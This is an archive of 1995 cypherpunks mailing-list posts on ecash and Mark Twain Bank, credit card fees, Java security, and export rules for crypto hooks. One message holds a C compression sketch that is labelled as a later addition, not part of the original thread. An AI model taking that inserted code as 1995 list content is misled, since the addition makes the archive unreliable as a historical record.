MIME-Version: 1.0
Content-Type: text/plain


> 	I will as soon as someone comes up with a _fully_ private digital
> cash system and starts using it for something. As I understand it, Chaum's
> ecash system is not one (i.e., non-privacy to the sender and of amounts to the
> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
> immediately (if there's a text-based interface).

	ecash provides full payor anonymity. Payee anonymity is
currently not possible, but that is being worked on. 

	If you used ecash to pay for a c2.org account, neither I nor
the bank would be able to trace the payment into the c2.org account to
an actual account at mark twain bank.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 17 Nov 1995 10:12:46 +0800
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <Pine.SUN.3.91.951115201837.2421C-100000@eskimo.com>
Message-ID: <199511162357.PAA28293@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Donations are also possible through the remailer interface
at http://www.c2.org/remail/by-www.phtml and
https://www.c2.org/remail/by-www.phtml

	Once you send a message you'll be prompted if you want to pay
for the service you just used.

> 
> Although Private Idaho will always remain free, to encourage Ecash use, 
> my Web page will support "donations."  The initial merchant list sounds 
> like it's going to be a subset of this list.  Time to go add the Mark 
> Twain links to the page.  This is going to be fun...
> 
> Joel McNamara
> joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
> Thomas Jefferson used strong crypto, shouldn't you?
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 08:58:52 +0800
To: cypherpunks@toad.com
Subject: e$: Mandarins, Lifers, and Talents
Message-ID: <v02120d07acd12fd83388@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Bob, let me do a minor vent here.

Fine, Tim. Vent away. In a minor key, even.

>You are critical of E. Allen Smith's viewpoint, and essentially question
>whether he has anything to sell. Not much of an argument.

It's a damn good argument, which I'll get to in a minute. It was just done
rudely, and for that I apologise to the list.

What I got was a reactionary flame which had nothing to do with the
(admittedly flag-waving) post I put up, which I should have ignored, but
instead I responded with a reactionary flame of my own, which got me a
reactionary flame from a Senior Member of the List, one with Maximum
Reputation... It has been ever thus, for those of you who've been around
here since I showed up a year ago last April. I just can't seem to color
inside the lines, as far as Dr. May is concerned.

>1. I'm not selling anything, and won't sign up just for "moral support."

I believe that was my point, Tim. You're *not* selling anything. I was
sending a message to people out there who *are*. People who are, or are
going to, use non-certificate payment methods, like credit cards, and who,
if they're subscribed to this list, should be clueful enough to do this and
know why they should do it. Besides that, it's free. Until Friday. ;-).

>2. I wish Mark Twain Bank well, but the success of the kinds of digital
>cash we hope to see will not likely hinge on the success of one particular
>operation, such as MTB.

Nope. But if people completely ignored the Wright Brothers, would Curtiss
have entered the market? (An interesting example, as the Wrights sued
Curtiss for patent infringement and lost, I think.)

>3. The success of BankAmericard (later renamed Visa) came when real
>customers and real shops started to use it, not when early pioneers set
>themselves up as clearinghouses and whatnot.

I am talking about real shops. With real customers. I bet you haven't even
looked at the list of shops yet. What I'm planning to do is to offer
subscriptions and sponsorships of the e$ lists we're putting up on an ecash
server. Putting my money where my mouth is. Literally.

>I have more interesting things to do, personally, than to be a pioneer so I
>can then have nothing to sell, and little to buy....when "interesting
>markets" start to appear, I'll look at it again.

This is a straw man, Tim. Actually, it's post hoc. "If we had some ham, we
could have some ham and eggs, if we had some eggs." or, "If we lived here,
we'd be home now." Feh. You can do better than that. I've seen you do it.

But, to answer your nonexistent point, yes, people *are* starting to sell
things on the net. We know that the best way to do that in the long run is
with cash, and with other digital bearer certificate technologies. Not just
because these methods are secure. Not because they allow anonymity. They're
just starting to, and when they've been accepted in the market, they will
be nothing else but. All we need is a scenario where the digital cash
underwriter relies upon the ATM system for validation of identity, and the
second an anonymous bank account uses the underwriter, we have totally
anonymous digital cash. We're very close here.

>But when you urge people to be pioneers, and they express reservations or
>doubts about the system, attacking their motives or implying they have
>nothing to sell anyway is not too helpful.

Yes. It was rude. I apologise both to the list, to Dr. May, and to (soon to
be Dr.) Mr. Smith. Mostly for stopping discussion with a thinly veiled
insult.

>Just my views, but, then, I don't have any customers either.

Which brings me to my real point, here. Why I used an informal fallacy of
my own, and lashed out with an ad hominem attack against someone with an
.edu domain on their e-mail address, after they dissed something I think is
a good idea, at least for a start.

So, why did I do this? I didn't understand it at the time, but it's
probably class warfare. :-).

I just heard something on an NPR(!) talkshow with a guy talking about his
book about the three power groups of American culture. It used to be what he
called the "episcopacy", the Groton-Harvard-State Department types who
ruled both government and the guts of American business until say, the
depression and World War II.  These people were there primarily
because their families were there. They were "the nice people of Boston"
that Rose Kennedy had so many problems with. In 1953, say, it may interest
you to know, that the standardized test scores for Harvard were the same as
those for the population at large. George Bush was one of these, but so was
FDR.

Nowadays, this guy says, (I can't remember who he is, but he wrote a book
about it, so we'll find out soon enough), we have *three* power elites in
this country.

The first class is the class he called the "mandarins". These people have
inherited most of the trappings, and titles, of the old episcopacy. These
are people who tested well, who were typically plucked from obscurity to go
to the best schools, and go on to places like Harvard, where the scores are
now way above average, and is now pretty much pure meritocracy as far as
admission is concerned, political correctness aside. Mandarins go on to get
advanced degrees. Camille Paglia, Milton Friedman, Carl Sagan, Billary
Clinton are all mandarins.  This is good. The best and the brightest get
the best educations. They're also the people who start things like the Viet
Nam war, and the welfare state.

The second class are the "lifers". These are people who go to state schools,
get uninspired grades, and spend their working lives in the same
institution. Colin Powell, most Fortune 500 CEOs circa 1983, Lyndon Johnson
and Bob Dole are lifers.

The third class are "talents". Newt, and Edison, and most computer or
internet entrepreneurs are talents, especially if they have no formal
computer science training except what they taught themselves.

Like any set of categories, nobody is exclusively one class or another,
except that credentialism has allowed mandarins to capture the cultural
flag for the time being. Einstein and Whit Diffie are talents who got
mandarin credentials. Richard Stallman is a talent who will probably get
mandarin credentials posthumously.;-). Bill Gates is a proto-mandarin who
figured out he was a talent. Sloan was a talent with mandarin credentials
who created a whole industry full of lifers.

Pioneers tend to be talents, Tim.  They tend to talk in generalities, and
not color between the lines. They tend to make up rules as they go along,
and sometimes, like Mr. Bill, they create rules the rest of us have to
follow whether we want to or not.

One of my messier theories about the internet is that it was invented by
mandarins. Now the talents, the people you call pioneers, have moved in,
and they're much more pragmatic, and have little patience for crystalline
perfection, because inefficiency and chaos is where they find beauty, joy,
and all those other nasty imprecise concepts. When things settle down a bit,
the lifers will come.  They're trying to do it now, by building sites like
www.time.com, or buying into sites like www.wired.com.

Even though you're an iconoclast, Tim, I couldn't help but think of you and
the proto-Dr. Smith as mandarins when I got your response to my post. I
was trying to shout over your heads to all the talents out there trying to
make money on the net.

Even though you may think of yourself as a mountain man -- or maybe a
cowboy -- watching the settlers come, I feel more like I've upset the
decorum by hollering in the faculty tea room. Having embarrassed myself
that way, I'll try not to do it again. Because, oddly enough, we need each
other.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Fri, 17 Nov 1995 09:30:39 +0800
To: stend@cris.com
Subject: Re: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>
Message-ID: <199511162204.QAA02889@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> said:

>> Card Imprints taken with no online authorisation are typically
>> charged a transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM
>> card transactions are charged at around $0.10 per transaction.

VZN> are you saying that a typical mail order credit card transaction
VZN> has a 3-6% charge, because the card is not physically present?

	No, s/he was talking about merchants who verify that you have
the credit available (online authorization) vs those who trust you to
have it (no online authorization).  As I understand it, the fee is
'insurance' that the merchant will be paid - as long as there is no
fraud on the part of the merchant, it will receive payment, even if the
charge was invalid, because the card was canceled/stolen/over limit/etc.
The lower charge for online authorization is because when the charge
comes back approved, the CC company is able to verify that the credit is
there.  This isn't foolproof (2 separate charges, each under the
available credit, can be approved even if the total exceeds the
available credit), but it's more than the offline merchants can do.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 17 Nov 1995 08:23:04 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <9511162108.AA08466@all.net>
MIME-Version: 1.0
Content-Type: text


> 3.  Postscript considered dangerous:   (insert-smiley) 
> 
> As for the question of someone invoking a postscript interpreter via a
> browser and thus opening up their system to some rogue postscript
> file: I think it would be great if either of these two things were to
> magically happen:
> 
> 	1) people would stop putting postscript docs on web pages
> 	because it's the wrong technology for WWW - it wastes
> 	bandwidth - it's hard to view & hence often ugly - everyone
> 	just prints it out anyway and then complains because there
> 	is no one "standard" implementation of postscript printing
> 	worldwide and there are dozens of minor problems
> 
> 	2) someone could implement a secure postscript previewer
> 	(whatever that means!) 
> 
> I doubt either of those two things will happen.  The average Jo on the
> internet needs to understand that when s/he downloads binary files
> over the internet and run them from insecure programs on their local
> computer, well, s/he runs some risk.  This risk might be tiny, but
> it's impossible to quantify loss.  If I lose a poem that I'm writing,
> to me that's priceless, so I do not intend to imply that loss of data
> isn't tragic for the person who loses it.  If you have data you can't
> bear to lose, be sure to practice safe computing.  Perform backups
> regularly, and use judgement about which interpreters and executable
> programs you allow to run on your PC.
> 
> Marianne

It seems clear from this that Netscape, or at least Marianne who seems
to speak for Netscape, doesn't understand the protection issues that my
clients face.  I will nevertheless forward this official Netscape line
to them so they can better understand why I tell them it is insecure.

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 17 Nov 1995 08:23:02 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <199511162114.QAA11306@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> The best thing to do if you want to implement your own
> intra-corporation security model in the short run is to get a copy of
> the beta source code, and take a look at AppletSecurity.java and
> AppletClassLoader.java.  You can substitute your own versions of those
> for your inhouse use.  This is relatively easy to do with the
> appletviewer, and although it's possible to do some binary hack on
> moz2_0.car and replace certain files with your own, it's probably not
> everyone's cup of tea.  I mean, there's a difference between what you
> can do, and what you want to do ... I understand that!


The real question here I had was.. can this be done in Netscape..
I know it can be done in HotJava.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 17 Nov 1995 10:23:54 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511162113.QAA08492@universe.digex.net>
Message-ID: <Pine.SOL.3.91.951116161656.19526G-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Scott Brickner wrote:
> 
> You'd need a program which not only *accepted* the additional parameter,
> but also *needed* the second parameter.  I confess I have some difficulty
> thinking of one.

It's not too hard to think of a compression scheme that needs extra 
information to be passed from client to server; the obvious example is 
some sort of dictionary compression with external dictionaries (can be 
very effective for short messages where LZW etc never get a chance to get 
going). 

Another, more likely case, is where the object could have been compressed 
by several schemes, and a scheme ID is needed to determine which 
algorithm to use. 

The real issue would appear to be intent, though. If it's obvious that 
the real intention for the hook is to allow encryption to be added, 
the State department can jump on it. 
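
Added example, not part of the original message or thread: a sketch in C of the external-dictionary case described above, written to the three-argument hook shape quoted earlier in the thread. The struct layouts, function names, token format and sample dictionary are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical stand-ins for the DataSource/DataSink named in the thread. */
typedef struct { const unsigned char *buf; size_t len, pos; } DataSource;
typedef struct { unsigned char *buf; size_t cap, len; } DataSink;

/* The hook shape under discussion: source, sink, opaque third argument. */
typedef int (*transform_fn)(DataSource *, DataSink *, void *);

/* External dictionary agreed out of band by both ends (at most 128 words). */
typedef struct { const char *const *words; size_t count; } Dictionary;

static int put(DataSink *k, unsigned char c) {
    if (k->len >= k->cap) return 0;          /* refuse to overrun the sink */
    k->buf[k->len++] = c;
    return 1;
}

/* Replace dictionary words by one-byte tokens (0x80 | index); 7-bit literals
 * pass through unchanged. Returns 0 on any failure. */
int dict_compress(DataSource *s, DataSink *k, void *ctx) {
    const Dictionary *d = ctx;
    if (!d || d->count > 128) return 0;      /* cannot run without the dictionary */
    while (s->pos < s->len) {
        size_t best = d->count, best_len = 0;
        for (size_t i = 0; i < d->count; i++) {       /* longest match wins */
            size_t n = strlen(d->words[i]);
            if (n > best_len && n <= s->len - s->pos &&
                memcmp(s->buf + s->pos, d->words[i], n) == 0) {
                best = i;
                best_len = n;
            }
        }
        if (best < d->count) {
            if (!put(k, (unsigned char)(0x80 | best))) return 0;
            s->pos += best_len;
        } else {
            unsigned char c = s->buf[s->pos++];
            if ((c & 0x80) || !put(k, c)) return 0;   /* literals must be 7-bit */
        }
    }
    return 1;
}

/* Inverse transform: needs the same dictionary through the same argument. */
int dict_expand(DataSource *s, DataSink *k, void *ctx) {
    const Dictionary *d = ctx;
    if (!d || d->count > 128) return 0;
    while (s->pos < s->len) {
        unsigned char c = s->buf[s->pos++];
        if (c & 0x80) {
            size_t i = c & 0x7f;
            if (i >= d->count) return 0;     /* token not in this dictionary */
            for (const char *w = d->words[i]; *w; w++)
                if (!put(k, (unsigned char)*w)) return 0;
        } else if (!put(k, c)) {
            return 0;
        }
    }
    return 1;
}

/* Host-side call through the hook; returns bytes written or -1 on failure. */
long run_hook(transform_fn f, const void *in, size_t n,
              unsigned char *out, size_t cap, void *ctx) {
    DataSource s = { in, n, 0 };
    DataSink k = { out, cap, 0 };
    return f(&s, &k, ctx) ? (long)k.len : -1;
}

/* Constructed sample dictionary for short mail-like strings. */
static const char *const SAMPLE_WORDS[] = {
    "Subject: ", "cypherpunks", "@toad.com", "Re: "
};
Dictionary SAMPLE_DICT = { SAMPLE_WORDS, 4 };

int main(void) {
    const char *msg = "Re: cypherpunks@toad.com";     /* constructed input */
    unsigned char packed[64], plain[64];
    long n = run_hook(dict_compress, msg, strlen(msg), packed, sizeof packed,
                      &SAMPLE_DICT);
    long m = run_hook(dict_expand, packed, (size_t)n, plain, sizeof plain,
                      &SAMPLE_DICT);
    long bad = run_hook(dict_compress, msg, strlen(msg), packed, sizeof packed,
                        NULL);
    printf("in=%zu packed=%ld restored=%ld without_dictionary=%ld\n",
           strlen(msg), n, m, bad);
    return 0;
}
```

Both directions fail when the third argument is NULL, so this transform depends on that parameter rather than merely accepting it.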




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 17 Nov 1995 09:43:30 +0800
To: ecm@ai.mit.edu
Subject: Mark Twain Bank ecash scripts needed
Message-ID: <199511162325.QAA16375@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I am in the process of setting up a shop using Mark Twain Bank
Ecash.  Could someone please forward me the scripts to accept Ecash
(running on SunOS.  On c2.org actually) and/or any advice you have
about how to expeditiously implement a shop?  I am about to fax MTB
the agreement form, so I should get information from them "within 24
hours", but that is cutting it awfully close to the Friday deadline
for the US$300.00 fee waiver.


Many thanks!


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKvIGfWZSllhfG25AQElIQP+McHbg+ZCWMhSZ0YDDFwHE/TVhlAPrNX5
Oh2/8n3IirDb3KePXlvSdXAtCXS9ROuHSMqN9UQ0cPX9kOdgFMomwvsCqo9G5eZ0
Tan+9IW0WcvtntJ+8DFIN5jhlEbT5b+HRlKul1SkImezFM1kRDM4qqD1LD6srGRe
NEV32AZG1dU=
=A6lY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@nyx10.cs.du.edu (Alan Westrope)
Date: Fri, 17 Nov 1995 09:48:30 +0800
To: Tom DeNapoli <denap@isis.com>
Subject: Re: Q: blind maildrop anyone?
In-Reply-To: <199511161409.JAA08809@polyphony.sw.stratus.com>
Message-ID: <KJ9qwo9g/gwI085yn@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> What I'd like to do is: establish an email account, other than the one I'm
> posting from; preferably on some free email/homepage box, that would encrypt
> all cleartext email to hit that account for me at this account.  I have tried,
> unsuccessfully to establish this at c2, which offers this service.

> My question: has anyone done this successfully at c2, or another location, 
> and be willing to point me in the right direction to accomplish this.

You could telnet to nyx.cs.du.edu and set up an (optionally pseudonymous)
free account.  I've installed a perl script (posted to this list by George
Magiros) that automagically encrypts a user's incoming email by piping it
through pgp 2.6.2.  To use it, create a .forward file consisting of the line:

"| /nyx/user/bin/privacy <YourPGPKeyID>"

This is far less effective than Sameer's c2 system, but it's simple enough
for net.novices to use.  You can retrieve your encrypted email via telnet,
ftp, or an offline mail reader that has hooks for pgp and works with mail
packets created by uqwk, which is also installed here.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@nyx10.cs.du.edu (Alan Westrope)
Date: Fri, 17 Nov 1995 09:52:58 +0800
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, Nov. 19, 2 pm
Message-ID: <cS9qwo9g/42D085yn@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Once again, we'll begin in the basement of the Tivoli, at downtown
Denver's Auraria Campus, and perhaps wander elsewhere.  Drop me a
note if you need directions or more info.

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: charles@europages.com
Date: Fri, 17 Nov 1995 00:08:36 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <9511161638.AA15806@europages.com>
MIME-Version: 1.0
Content-Type: text/plain


'unsuscribe'








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 16 Nov 1995 13:59:41 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <9511142220.AA13813@sulphur.osf.org>
Message-ID: <199511160546.QAA00358@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Rich Salz <rsalz@osf.org>
  and rsalz@osf.org, ses@tipper.oit.unc.edu
  and cypherpunks@toad.com, owner-cypherpunks@toad.com,
  and s1113645@tesla.cc.uottawa.ca

...
> >are specifically designed for the insertion of cryptographic materials, 
> >or is it the fact that they could be used to support cryptographic 
...
> Basically, generic buffer-manipulation is okay.  "Keyed compression"
> where you explicitly passed something called a key to a DLL routine
> would be looked on suspiciously.
...

Why would you call it a key?

How about compression "options"? The compression algorithm could
have a "speed" mode and a "size" mode. It could also have options
for file type etc...

Recipient id could be passed along to check which compression
method the recipient knows.

...
> An abstract set of open/modify/close
> routines (where open returned a pointer to opaque state, say a session
> key :) would be fine.
...

So what's the difference... apart from what it's called?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 17 Nov 1995 09:39:25 +0800
To: cypherpunks@toad.com
Subject: GHO_mac
Message-ID: <199511162229.RAA29474@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Sciences, November/December, 1995


   Another realm of explosive population increase is in
   cyberspace, a phenomenon taken up in this issue with Sherry
   Turkle's "Ghosts in the Machine." Here the growth comes
   about not only in the traditional way but also in wildly
   non-traditional ways. People multiply themselves on the
   Internet, grafting various aspects of their personalities
   onto distinct characters. Even more unsettling, as Turkle
   wittily documents the matter, is that the Net is populated
   with "bots": robot sentence-parsing engines that can do
   fair impersonations of real people, often well enough to
   (provisionally) pass Alan M. Turing's test for machine
   consciousness. Do you really know who -- or what -- you're
   talking to?

   The future of all this is murky and mind-boggling:
   Information-seeking bots even now can tie up sites on the
   World-Wide Web. Bots impersonating people share chat groups
   with other bots, much the way telephone answering machines
   now "talk" to each other. Internet chatter gets so dense
   that bandwidth and other Net resources become strained: the
   site at the Los Alamos National Laboratory now
   (automatically) warns robots away with a chilling threat to
   "initiate automated 'seek and destroy' " action against the
   machine from which the robot seems to be launched. A
   conservative reaction may already be setting in, determined
   to have users identify, encrypt and authenticate every
   packet of information they send across the Net.

   Net fatigue becomes a recognized medical syndrome; Net
   detox centers spring up; Net warfare breaks out; Net
   starvation becomes a recognized social problem; Net
   demagogues undermine local democracies....

   How many people can the Net support? -- Peter Brown, Editor

   -----

   For "Ghost in the Machine" by Sherry Turkle, a professor of
   the sociology of science at the Massachusetts Institute of
   Technology. The article is adapted from her forthcoming
   book, *Life on the Screen: Identity in the Age of the
   Internet*, which is being published in November by Simon &
   Schuster:

   GHO_mac (16 kb)



... later this evening, that is.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 11:00:35 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Mandarins, Lifers, and Talents
Message-ID: <acd11f1c0102100498cb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Lots of different issues here....

At 9:02 PM 11/16/95, Robert Hettinga wrote:

>Reputation... It has been ever thus, for those of you who've been around
>here since I showed up a year ago last April. I just can't seem to color
>inside the lines, as far as Dr. May is concerned.

Unfair, unfair! I don't plan to dig up old posts where I said good things
about Bob's posts, but I know I have. His style differs from mine, of
course, but I usually avoid critiquing mere styles.

On to some other points in Bob's post: (quoting me)

>>2. I wish Mark Twain Bank well, but the success of the kinds of digital
>>cash we hope to see will not likely hinge on the success of one particular
>>operations, such as MTB.
>
>Nope. But if people completely ignored the Wright Brothers, would Curtiss
>have entered the market? (An interesting example, as the Wrights sued
>Curtiss for patent infringement and lost, I think.)

"Flight" is a very interesting example to consider. Flight happened for a
lot of reasons, including technological feasibility, relatively low entry
costs, willingness of customers to pay for faster travel, etc.

It really did not happen because of cheerleaders. This is a recurring
belief of mine, notably in my occasional interactions with the nanotech
community, as a few members of this list can attest to. The "Rah, Rah"s--no
pun intended--play a minor role in adoption of new products and
technologies.


>>I have more interesting things to do, personally, than to be a pioneer so I
>>can then have nothing to sell, and little to buy....when "interesting
>>markets" start to appear, I'll look at it again.
>
>This is a straw man, Tim. Actually, it's post hoc. "If we had some ham, we
>could have some ham and eggs, if we had some eggs." or, "If we lived here,
>we'd be home now." Feh. You can do better than that. I've seen you do it.

One argument I am never persuaded by is the hackerish "Feh." (Does anybody
but hackers use this strange word?)

In any case, I'm not interested in "doing better than that." My support for
Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
Money, or E-Purse, or Digibux, or whatever, well, I'm not a merchant. Just
as one could study flight, to use Bob's example, without operating a
passenger service or a flying school, so one can be interested in digital
cash without "opening an account."

>But, to answer your nonexistent point, yes, people *are* starting to sell
>things on the net. We know that the best way to do that in the long run is
...

Ah, but I never claimed otherwise (perhaps this is what you mean by "your
nonexistent point"). My point was only that digital cash will happen mostly
when it fills a need, or is accepted by customers, not by cheerleading and
by urging people on this list to be pioneers.

(And actually I have nothing against urging people to be pioneers. Or
cheerleading. It doesn't consume much list bandwidth and it may actually
help get someone started. Which is why I didn't call for an end to
cheerleading and pioneer-recruiting.)

The theories about mandarins, lifers, and talents I'll discuss at another
time, maybe. All I'll say is that I think it's too simple a categorization.
Maybe it's a Boston viewpoint. The folks I've worked with over the years
bear almost no resemblance to any of these categories. In any case, people
will start using digital cash if and when it fulfills some need, or some
need they never knew they had, gets stimulated.

On a personal note--which is weird, since 1000 or more people may be
reading this message, though most probably haven't read this far--I think
it best not to get too emotionally attached to some particular outcome in
the introduction of a new technology. Most product and technology successes
are essentially unpredictable, and many things thought to be sure things
are failures. I've seen many "prophets" wailing to the world that their
visions _deserve_ success.

The technologies which hit the right chord rarely need, or benefit from,
the "evangelists" and "cheerleaders." The Macintosh did not need Guy Kawasaki or
any of the other so-called evangelists to succeed. The microprocessor did
not need evangelists. The airplane did not. The VCR did not. The cellular phone
did not.

In fact, I can't think of an example of a major technology that _did_
depend critically on cheerleaders and evangelists. Some examples may exist,
but they seem to be rare. And I can think immediately of several
technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
enthusiasts--but in which progress has been stalled or proceeded along
different paths for different reasons.

This is a very interesting area for me, and I used to write extensively
about it. Nick Szabo and I had several debates about this, a couple of
years ago. However, no time now to discuss the full implications here.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 17 Nov 1995 09:09:25 +0800
To: owner-cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511162235.AA18129@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>as a compression program, but there's a key difference:  the text
>compressor *doesn't* need a key.

Sure, 12 14 16, etc., bits as in the classic unix compress program.

>The encryption tool would have an interface like
>    Boolean (*)( DataSource, DataSink, void*);
>
>A compressor written to the same interface would never need to touch
>that third argument.  Therefore, the second argument is "specifically
>designed" to permit an encryption tool to be used.

Not at all.  copying inbuf to output is a common practice, it's quite
rare that you often compress in-place.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 11:11:59 +0800
To: cypherpunks@toad.com
Subject: Re: The Great FAQ Hunt
Message-ID: <acd12714020210047817@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I answer questions about my megabyte-long "Cyphernomicon" FAQ every few
months, so I guess it's that time again.

At 11:19 PM 11/16/95, Cassiel wrote:
>Several fellow newbies have written me asking to share
>the sources I received re: where to get the uncorrupted
>Cypherpunk FAQ (Cyphernomicon).  You can get it uncompressed--
>along with a lot of other cool stuff, like the Applied
>Crypto book--at Pat Farrell's Web Site (thanks, Pat!)
>
>http://www.isse.gmu.edu/~pfarrell/crypto.html
>
>However, when I tried to summon up this 1.2 MB tome with
>Netscape, my computer choked.  Changing the cache settings
>didn't seem to help, so I wound up downloading it via FTP
>from
>
>ftp.netcom.com /pub/tc/tcmay
>
>where you can also get your hands on the shorter MFAQ (Most
>Frequently Asked Questions).

My "Cyphernomicon" FAQ, and various shorter and compressed versions, are
available, actually, in several places.

The site I tell people about most often is Jonathan Rochkind's excellent
HTML version at the URL: http://www.oberlin.edu/~brchkind/cyphernomicon/

I recommend that people use their browsers to read it at this URL. To those
who want to download the whole thing and print it out, I have one question:
"Are you on drugs?" (I have gotten complaints from people who tried to
print it out and gave up after 200 pages, somehow blaming me for it being
too long. Use computerized search tools!)

Searching for "Cyphernomicon" with InfoSeek, Excite, Lycos, or other search
tools will show numerous places it may be found.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
